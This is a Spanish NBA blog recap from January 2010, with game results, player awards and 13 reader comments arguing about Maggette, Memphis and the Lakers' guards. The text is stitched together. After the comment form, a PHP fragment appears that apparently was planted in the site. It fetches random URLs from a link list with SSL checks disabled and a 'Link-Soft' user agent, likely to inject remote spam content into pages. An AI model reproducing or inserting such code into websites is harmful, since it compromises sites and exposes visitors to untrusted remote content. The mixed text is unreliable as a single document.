La Crónica (18/01/10)

19 de January de 2010 por TheDeerHunter

Se demuestra que en estos momentos hay poco color en la comparativa West vs East.

Los Lakers le endosaron 34 puntos en el último cuarto a Orlando con un Kobe prácticamente inexistente. Al buen nivel de los Magic respondió la bancada amarilla encabezada por un sorprendente Shannon Brown, que celebró de esta guisa su anunciada presencia en el all-star weekend (desde Kobe, el primer laker en el concurso de mates). Llama la atención la manera con la que Lakers ganó el partido. Casi diríamos que pretendían dedicarle la victoria a alguno de nuestros contertulios.

Después, la legendaria defensa de los Celtics se mostró impotente ante un Nowitzki superlativo. El alemán le amargó la vuelta a Rasheed tras su lesión. Tres cuartos de lo mismo hizo Durant en Atlanta, pero es que además los Warriors ganaron a Chicago de la mano de un gran Magettee, los Rockets se impusieron a los Bucks en la prórroga y Wolves y Clippers tumbaron a Sixers y Nets respectivamente.

Fueron Bobcats y Wizards los que salvaron el honor de la conferencia. Los primeros supieron sobreponerse a una actuación MVP de Tyreke Evans y se sitúan por encima de un correcto 50% (más de lo que pueden decir la mayoría de los equipos del Este) y los Wizards aprovecharon la momentánea debilidad de Portland para sumar en estos tiempos de cólera.

Los Grizzlies están en la cresta de la ola y anoche volvieron a tocarle la cara a los Suns por segunda vez este mes. Los Spurs sí lograron, con bastantes dificultades, detener la racha de Hornets. Los “osetes” pasan de esta manera a los “avispones” en su lento pero inexorable viaje hacia la post-temporada. Quién lo hubiera predicho.

Por último, los Knicks batieron a los Pistons, situándose a las puertas de plaza de postemporada con un balance de 17-24.

PREMIOS

MVP: Esta noche hay mucho con lo que quedarse. A Raymond Felton le faltó un solo rebote para conseguir un triple doble (17-9-10); Dirk Nowitzki se cargó a los Celtics con 37 puntos y 7 rebotes; Corey Maggette fue el mejor de los Warriors con 32 puntos (11 de 14), 6 rebotes y 5 asistencias; y en Memphis, el trío Mayo-Zach-Gay se fue a los 86 puntos entre los 3.

Rookie: Buena jornada para los rookies en general. Desde Austin Daye en su segundo partido de titular esta temporada con 16 puntos y 6 rebotes hasta Jonny Flynn, liderando la victoria de los Wolves con 29 puntos y 9 asistencias, pasando por  Marcus Thorton y sus 16 puntos. Tyreke Evans ya juega en otra categoría.

Sorpresa: Este Ben Wallace no es el mismo que se arrastraba por los pabellones la temporada pasada. Ayer logró anotar 16 puntos y capturar 14 rebotes y ojito que lleva una media cercana a los 10 rechaces esta temporada. La última adquisición de los Nets, Kris Humphries, demostró ayer que, al menos, puede hacer números en esa banda. 21 puntos y 7 rebotes.

Decepción: ¿Podemos hablar ya de crisis grave en los Magic? ¿Y podemos personificarla en Vince Carter? El ex de los Nets cuajó ayer otro mal partido con 9 puntos en una serie de 3 de 11 en tiros de campo. Hay que reconocer que tampoco Kobe Bryant tuvo, precisamente, un buen día…

Esfuerzo en vano: Josh Smith se multiplicó intentando lograr la victoria frente Durant y compañía pero al final, los 18 puntos, 12 rebotes, 7 asistencias y 3 tapones no fueron suficientes. En los Kings, Tyreke Evans consolida su golpe de estado y demuestra quien es el nuevo líder del equipo con 34 puntos, 4 rebotes, 7 asistencias, 2 robos y 3 tapones.

Comenta

13 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

      Citar

  2. xapa_croack dice:
    #2

    Maggete en el mes de enero 28.3 puntos con 56% de acierto y 90 en tiros libres.

      Citar

  3. jonatan dice:
    #3

    Ya que has hablado de Maggete, es impresionante el nivel al que esta rindiendo ahora mismo, lástima de ese récord que también perjudica a Ellis, los dos están rindiendo a un nivel altísimo.
    Por cierto, biedrins ayer espectacular 9pts 19rb y 8 tp lástima de esos 6 TL fallados

      Citar

  4. pcerezo dice:
    #4

    Sin duda Memphis el equipo del año y Lionel Hollins entrenador de lo que va de año una vez que parece que Rockets se desinflan. Tremendo 18-9 desde el inicio 1-8 de principio de temporada. La temporada de Zach Randolph es impresionante, si no es All Star es para una y gorda…

    Lo de Orlando huele mal, muy mal…Van Gundy está en la calle antes del All Star…

      Citar

  5. Rompe dice:
    #5

    Creo que también hay que darle el mérito que se merecen los Thunder. Al principio de temporada la verdad es que pocos apostaban por verlos apalizando a los mejores, con un Durant en estado de gracia. Quizás es menos sorpresa que los Grizzles, pero también es destacable su actuación.

      Citar

  6. Love Denise dice:
    #6

    Acabo de ver el LAL-Mag diferido, y hoy Orlando no ha jugado tan mal como en la ultima semana, han defendido muy bien a Bryant, han vuelto a meterle balones a Howard, y lewis ha estado fino, solo que Lakers ha sido superior al final con un Brown muy enchufado, y que deberia ser el base titular de este equipo.

      Citar

  7. Noelinho dice:
    #7

    si habláis de GS no os olvidéis de nombrar a Curry, que para mi está haciendo una gran campaña y está mejorando muchísimo en las últimas semanas, ayer 26pts 10rebs y 6 ass con 50% de porcentaje.
    A mi Maggette, por muchos números que haga, lo veo jugar…y bufff me da bajón.

      Citar

  8. flavsgordon dice:
    #8

    pero vicentin no andaba jodido del hombro? si es así no veo por qué focalizar la decepción de orlando en él. Aparte de que perder en el Stapless no es algo tan grave…

      Citar

  9. Viva_Dirk dice:
    #9

    Denise no creo que Brown deba ser el base titular de los Lakers, en el quinteto no hace falta para nada, estando Kobe y Pau al 100% el rendimiento ofensivo esta asegurado, son capaces de surtir de balones a Bynum y provocar tiros abiertos para Fisher.

    El sitio de Brown es el de 7º hombre aportando cuando mas falta le hace al equipo.

      Citar

  10. jonatan dice:
    #10

    Otro apunte para la opinión de xapa_croack

    Maggete lleva 15 partidos seguidos con mas de 25 puntos, los porcentajes de tiro de campo de Maggette durante estos 15 partidos han sido superiores al 60%

      Citar

  11. CAMPO2 dice:
    #11

    MUY CHULAS LAS ZAPAS DE CARTER POR CIERTO

      Citar

  12. Love Denise dice:
    #12

    vivadirk, que brown esté en el 5 inicial, no lo digo por su capacidad ofensiva, sino porque Fisher ya ha demostrado este año que es una abuelita defendiendo (veáse A.Miller, Udrih o Parker, etc….), ha sido un gran jugador que le quedarán por meter triples importantes todavía, pero ya no está para jugar mas de 15 minutos en un equipo importante.

      Citar

  13. Viva_Dirk dice:
    #13

    Lo de Fisher ya pasaba el año pasado y salvo en casos puntuales no hay muchos bases en la NBA que requieran de una superdefensa, y cuando lo requieren ahí esta Kobe para hacerse cargo de ellos hasta que salga Brown. Fisher conoce los sistemas al dedillo, es uno de los capitanes y segun se acerquen los play-offs estará mas fino en el lanzamiento exterior.

    La exigencia con Fish en la regular es mínima, sabiendo que en play-offs rinde en ataque y sabe sacar partido a su veterania en defensa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>